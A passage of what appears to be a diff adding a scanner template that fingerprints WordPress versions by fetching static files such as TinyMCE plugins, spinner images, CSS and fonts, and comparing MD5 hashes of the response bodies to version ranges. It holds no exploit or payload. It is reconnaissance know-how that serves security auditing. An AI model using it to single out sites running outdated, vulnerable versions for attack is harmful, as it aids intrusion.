- 4.7.19 + dsl: + - "(\"831204a97da9fa6b6784885a930a2743\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"5c23255ad2d11db3f72c33b649f1389a\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"dda52a147fa87063ac5b78dae4d8afa4\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"0911253e82299afa85c2950c033bb68f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"e21c5873be5aa8407266377225b67c26\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"318a17ced489d313fa5d74038ef540a0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"bc5a8cc213bb3fe51b5673b64dd9d408\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4c25dd1c151e1a2e3b196e8371404f03\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3231e7edd451f1950c2a856e68950399\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - 
"(\"218b586940473a3d64d408b22fa603ae\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"aeb8638d01b2c3c7fbf36e69893f4b25\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ac627e9017143d091eb11ab6cf1ee68b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"59afca0b460ebb487e2717c2df92cf96\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"35657b2be541481d479c3fb22192f2b1\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"3d42b6ec9f848bb610500d4cf6e2a00c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"451c40101c1a2f619c2d7dd4d6d0981f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"3834eac105922686e034799a66a771cb\" == md5(body))" + - type: dsl + name: 3.9 - 4.7.3 + dsl: + - "(\"5798e3d2fb0180a9179b8bd7cf728eae\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"4c927b02ec9bc57017eab8d7b6dcd2a0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"6e485d9790488dcaf9f3f00dcf63f856\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"78302f1959b7a828bba2949c70ffe5f9\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"60de57253ca9143a6f1e4aff10fc39d2\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"241cedb5e02850e752c919a2cdc4153e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"884572e84844add444b1c133a61f9a40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/validate.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"23a879a6f9b566ddb32810a3bcbd00e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"c42b5160bdbefd1293d76b30520757f4\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 
+ dsl: + - "(\"681466e5980a5b99d9baeded56c67d34\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"2d73c0757ea622f65738ea71433ca8e4\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"bc074582820655b7a729e7f92a206b66\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"6fc5abb84e8ba8ba87b12ad6806f48d1\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5e365dba77123f9e7946af32055d2870\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"dcbd63050e6909b44e0d0c843ab5ff32\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"6ec1ea2ca3aed0b4b0e36fc9ac48db5a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3b909b4fa79d9e7e388561b097d13499\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"434cc20c313f6f2b033b84f8fb7b5986\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/spinner-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/spinner.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"3fba1544df24f40dde5876c8c0aec461\" == 
md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"897e92e82f6bc223783659c9237f40b6\" == md5(body))" + - type: dsl + name: 2.7 - 3.8.35 + dsl: + - "(\"68a8e57741df1a16444713a11d7c5b82\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"cbd61f6c4eed10fb1317038905abc4cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-2x.gif" + matchers: + - type: dsl + name: 3.9 - 4.9.16 + dsl: + - "(\"f5e118653f892606682ee9c51d0aba99\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"83e904eb31b68fa48cfdbcaa64ef2966\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"887b335656b4ed4656ac1c1966e4254b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-rtl.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"db9217196313c95a59d43601da19c51d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d982b0845bb1b67b2b2db7dd805c8737\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"ddaa579f547c7877730ae2a599a0a0df\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"6e43258f59d8669c88f876b5462e0e7a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/spinner-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-rtl-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"f7c99ee74014fe92541012303aaadc7d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"39a1182eec9c2d959f6cc0a145a55b9a\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - 
"(\"fcd61114e538d359a80d419d6554f55e\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"cf154dd5ef93f9a84df148f521fe5941\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/spinner.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"395ebbb01f0499dc79323d9e46bf99c9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"15e9d8008259ea9efd13495d1b0fa110\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"db1efc9ef2967c05b500794a813de4c2\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"c14f53b547661c4be7bd9a8e38dcdb5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"55d6b57d8020d981dd12e3308c6d326e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"48226e1fae8c43c0c82c1995a8555c40\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"6fa315b18e9016357bc9f8c1b32524f5\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"2b2ed5045b480dcfac2e6babbd2f2007\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor-rtl.min.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7637efd464f4dc9069c33f7833335917\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"ec293f73d213bb45f413489b1be4ddd1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor.min.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + 
dsl: + - "(\"72c3a5be39a933d8763bdd8f10b3e69a\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"4f2bbc906ad777689f33ed3a8e11de4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"b32d5cea64b4fd156f47c0ec0a9d8532\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"456c02ee2a496580a24e5aee614ba9b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"89a4e64830ce633b60f1e4060faa5726\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"8e8cdd77e6e80407255b55c41dc533a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"3c6accf0039920bf3c59748c23f4261d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/esprima.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"645f991220db5392f167abb9d99bb493\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/fakejshint.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"35c876f72c524f6c78065d4a27294b1b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/underscore.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"f893e294cde60c2462cb19b35aac431b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"543f57b60e1bb0ccc7234008d2e0ba1d\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 
+ dsl: + - "(\"22538c49f524050bd8300b44526abc2a\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"66ed7befbb2773566ed188e1d3b97cc4\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"783a6e647e90523f40158eec5a12f999\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fc025b0a68f5ac5cfb7af7d9aebbeaf2\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"1f2043b8c3c8ad3f64847bd7ad568581\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"b8176b7448cc4a20744ca6c5e88e4c41\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e10227de7811e15dc17a31abf79b9338\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.3 + dsl: + - "(\"68c99b9ceacf91b4e3c3b471ba349cf2\" == md5(body))" + - type: dsl + name: 4.2 - 4.5 + dsl: + - "(\"a5ca0a92e1bdf1fbf3f9a07db5573092\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"870511532b062a500c95ae81e1cf23d3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d02999f00764899d370b2eb1a56a5f95\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9ee18d31f9106a72a4ce6232064be838\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"a8755e1442ead9a4d91bb150338cf406\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"d5da6dc53df2bff42ff9155d426a1794\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c4dc76993c68e4e4e8f0ceeeff70fc0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"484993eb38dba1019988702c7c8021a6\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.19 + dsl: + - "(\"5272a99516c467771ef3076422beb18f\" == md5(body))" + - type: dsl + name: 4.3 - 4.5 + dsl: + - "(\"ff76dd12efde3c20a321d00058535b3f\" == md5(body))" + - type: dsl + name: 
4.2 - 4.2.29 + dsl: + - "(\"f6f2de940de4a60ee25d7cff7a0ceab3\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"1149b1a1442a543492ba931ff0b66ad5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"78ddcc09dafb8cda5e889bbc78905ed4\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"ecdce896b4d8a990f3e4cd5dba46e4c0\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"03c6de7649cd96f85b56ff3e3e02e6be\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"02dc2569a033c9e1d6c966e4e8fbdade\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a3b1b0b468820d74eaff4f341cf797f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"428c9fb47a7b83fa0440a15886d0b11a\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"b4853cda3c7b4c55371939381cecdb86\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"22137a5439e008cf130d8a0c8e335795\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fd7ae993f8817e35a0caabd6c0744ac0\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"a40ec96b2b25c1356c33e6c1212db9b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"0bc0eefce537ac2df5bed92c13badf2b\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"5f21385b1f4513568d611d595040d141\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"2a8fc756a0859acaac1b9d20481979f5\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"c7be1a485e0a213bbb979352c97e497a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"90a8e01e559f995cb8eb526a8d97e8c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"2601d622e85809262029c6cf3dca8024\" == md5(body))" + - method: GET 
+ path: + - "{{BaseURL}}/wp-includes/js/zxcvbn-async.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"97a79e96a815b200139356055d752333\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"21a0938b5ced5349b5071d0c9bfe6923\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"133d902461d45b5a46295e0a9f13f17e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.js" + matchers: + - type: dsl + name: 4.2 - 5.0.11 + dsl: + - "(\"cab3598b438a9e63984f1c6e9dd79b01\" == md5(body))" + - type: dsl + name: 3.6 - 4.1.32 + dsl: + - "(\"4502421f188ad9e38079741edc36e118\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"1fb2abfd1de9863aa4fb38e4c5dd8ac3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c0d37a2f50f79db4eaaeb10c3c170990\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wpdialog.js" + matchers: + - type: dsl + name: 3.9 - 5.0.11 + dsl: + - "(\"72e8395fd44d4039009c5396888fa6ba\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c6b779020a09eebd206570dcd4a90666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"47510d7560d22a974c8c0eec6e24bcbd\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"5019624f50b503784fa5727337a9b532\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/language-chooser.js" + matchers: + - 
type: dsl + name: 4.0 - 5.0.11 + dsl: + - "(\"09e20150c7561d0330d7158f744abb4a\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"bc08d5fe72ba491b870cbb590ff93a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-suggest.js" + matchers: + - type: dsl + name: 3.9 - 5.0.11 + dsl: + - "(\"1e33290807fa8b2829ddb0347d0a9305\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6d5e23d3e9c18375703c379fe2eeb0ed\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"b9a41a61b44bc13d90f8861d6cb273b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"968528cb325471eb001fd8578a8625e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"0cc3913290e7f2383692254f9a03c586\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a06bba3593bca1f919fbb48fda7a24cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2257f52a92d7817195c7ea9659345ec0\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4073bd9326592a74f14d1eb051d246a4\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"0ada8c65bb367cab1cabc0defa1ac6a6\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"afb8e2f834d79d6e4735f1e96adbef5f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d729315fbe131ad6b6fed3c6fb27af69\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"eb2ea5040c616ab1da534bfa6940d877\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"bb1687b14f439591b839d9bbbb834166\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"a7a41ea9358b658ec53e9d042334c1a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"6b0c3754b1cd1f90566e174098fae8f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"5acd099f84c92a932b0e2897f49be665\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"90a61cfad08585040f6bebe2234d8aae\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"04e761d506e64836afab5d2550a3b8df\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"9267f79bc730290c6e2c90f9353d3ccf\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"50c955d592e8a54a0e4cb4936d386076\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"7262d908f15434ec7c3ae2126bc87350\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"ede808f6f04604681b25f843069de379\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"006a3d1ce8aad3f9d3d6a9c3f6129a36\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0d83661ec506e1571bee29a7cba9e2c2\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"f38d04d3a3cf83c12435370fd77c997d\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"b84225c5a236c3f6cc1aded9afcf48dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"d031f47facf4331979b6f9fbac3187ef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"6196b6eb25b52ac8bbe4a94e6da8ae27\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"240310067afb33df60639d7fd1fa132e\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"a4e6a52223e2edbd1bc2b621ec7c08c3\" == 
md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"50b8dc1736855fc2b8d71d669b0eabf7\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"248f6caf6179ea6c4035b7eaec7edd6e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"6401227790b9e544ef6b8d749cd0a358\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"06189313e1c7504e1edaa12766c2cfd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"aefbfcb02f143d3b3d3e47ff3de8efb1\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"1fb250c3b9bc34fd53cd883070e3dffd\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"20eaff7be8a4f2cde874a39a898155c4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"04f99db6f827ff1f7c68d6bc6b38ca99\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"d2673bd2dd98e5359b733f57ee3c4778\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"f8d2925604a55d7b8604a9875b8e70d3\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"db33e7676b65cdbfddbe8cdce17ca068\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"b8d94a6648c7a70c0496257bb2699599\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.6.20 + dsl: + - "(\"1c577cfb3bb7bf736f663243e04dc2f6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"2463b0d386cc5e574f4c6702ecd36490\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.8 + dsl: + - "(\"fdf2054f397ff2b9a724c63fbe1013ef\" == md5(body))" + - type: dsl + name: 4.9.9 - 5.0.11 + dsl: + - "(\"74194cbcf228ab10c16d37fded70705b\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"23e24e824f384c5eb11e73576b4ac93c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.js" + 
matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2265a1bd3059b1a457381c86d5dd9052\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"ed823838339ca0f88793fa781fc1e10d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7f233f44898ccd1f7284963110804e5f\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"2ea232d2a383e59441dc21dc56300749\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"29628f240ceb396ef0b56da19cf30f8c\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"2d76574de73331ae9a0bae951abc5490\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f62d0a9886eca92d1dba632dc5f46f1d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"db4a9159f318b8a8d1dce9cd40628d51\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"46dca3fdd473c8b6cec51e3ff5d700c6\" == md5(body))" + - type: 